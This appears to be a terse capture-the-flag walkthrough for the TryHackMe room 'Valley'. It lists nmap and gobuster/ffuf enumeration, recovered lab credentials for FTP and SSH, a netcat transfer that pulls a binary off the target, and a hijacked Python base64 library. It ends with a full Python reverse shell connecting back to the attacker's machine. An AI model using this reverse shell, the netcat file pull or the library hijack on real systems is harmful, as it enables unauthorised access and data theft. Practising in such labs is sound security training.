Valley
Room Link: https://tryhackme.com/room/valleype
Initial Scan
Kali
nmap -A $VICTIM
Scan all ports
ftp found on port 37370
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM
TCP/80 - HTTP
Kali
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
Kali
gobuster dir --url http://$VICTIM/static -w /usr/share/dirb/wordlists/big.txt -l
Kali
ffuf -u http://$VICTIM/static/FUZZ -w /usr/share/dirb/wordlists/big.txt
Username: siemDev
Password: california
TCP/37370 - FTP
Kali
ftp $VICTIM 37370
Username: siemDev
Password: california
TCP/22 - SSH
Kali
ssh valleyDev@$VICTIM
Password: ph0t0s1234
Kali
Lateral Movement
Netcat
Kali(receiving)
nc -l -p 1234 > valleyAuthenticatorVictim(sending)
nc -w 3 $KALI 1234 < valleyAuthenticatorKali
strings valleyAuthenticator > out.txt
Victim
Username: valley
Password: liberty123
Victim
cat /photos/script/photosEncrypt.py
Victim
locate base64
ls -lah /usr/lib/python3.8/base64.py
groups
Python Reverse Shell
from os import dup2
from subprocess import run
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("$KALI",1337))
dup2(s.fileno(),0)
dup2(s.fileno(),1)
dup2(s.fileno(),2)
run(["/bin/bash","-i"])Kali
nc -lvnp 1337
Last updated